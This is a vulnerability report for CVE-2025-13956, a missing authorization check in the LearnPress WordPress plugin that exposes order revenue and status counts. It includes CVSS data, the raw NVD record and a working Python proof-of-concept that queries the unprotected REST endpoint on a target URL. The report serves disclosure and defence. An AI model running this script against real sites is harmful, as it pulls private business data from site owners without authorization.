Security Vulnerability Report
CVE-2025-13956 CVSS 5.3 MEDIUM

CVE-2025-13956

Published: 2025-12-16 05:16:09
Last Modified: 2026-04-15 00:35:42

Description

The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the statistic function in all versions up to, and including, 4.3.1. This makes it possible for unauthenticated attackers to view the plugin's orders statistics, including total revenue summaries and order status counts.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

LearnPress WordPress LMS Plugin <= 4.3.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json

# CVE-2025-13956 PoC - LearnPress Unauthenticated Statistics Access
# Target: WordPress site with LearnPress plugin <= 4.3.1


def exploit_learnpress_cve_2025_13956(target_url):
    """
    Exploit for CVE-2025-13956: LearnPress Unauthenticated Access to Order Statistics

    This vulnerability allows unauthenticated attackers to view the plugin's
    orders statistics, including total revenue summaries and order status
    counts, via a REST API endpoint.

    CVSS: 5.3 (Medium) - AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    """
    # Target REST API endpoint
    endpoint = "/wp-json/learnpress/v1/orders/statistic"
    url = target_url.rstrip('/') + endpoint

    print(f"[*] Target: {url}")
    print("[*] Exploiting CVE-2025-13956...")

    try:
        # Send unauthenticated GET request
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
            'Content-Type': 'application/json'
        }
        response = requests.get(url, headers=headers, timeout=10, verify=False)

        print(f"[+] Status Code: {response.status_code}")

        if response.status_code == 200:
            data = response.json()
            print("[+] SUCCESS: Unauthenticated access to statistics!")
            print("[+] Response Data:")
            print(json.dumps(data, indent=2))

            # Extract sensitive statistics
            if 'revenue' in data:
                print(f"\n[!] Total Revenue Exposed: {data.get('revenue')}")
            if 'order_counts' in data:
                print(f"[!] Order Counts Exposed: {data.get('order_counts')}")

            return data
        else:
            print(f"[-] Failed: Status {response.status_code}")
            print(f"[-] Response: {response.text[:500]}")
            return None

    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None


if __name__ == "__main__":
    import sys

    if len(sys.argv) < 2:
        print("Usage: python cve_2025_13956.py <target_url>")
        print("Example: python cve_2025_13956.py https://example.com")
        sys.exit(1)

    target = sys.argv[1]
    exploit_learnpress_cve_2025_13956(target)
```

References

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-13956",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-16T05:16:08.513",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the statistic function in all versions up to, and including, 4.3.1. This makes it possible for unauthenticated attackers to view the plugin's orders statistics, including total revenue summaries and order status counts"
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-862"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/learnpress/tags/4.3.1/inc/rest-api/v1/frontend/class-lp-rest-orders-controller.php#L36",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c4b833c3-818d-4646-bd6d-8b3be13ea0f1?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```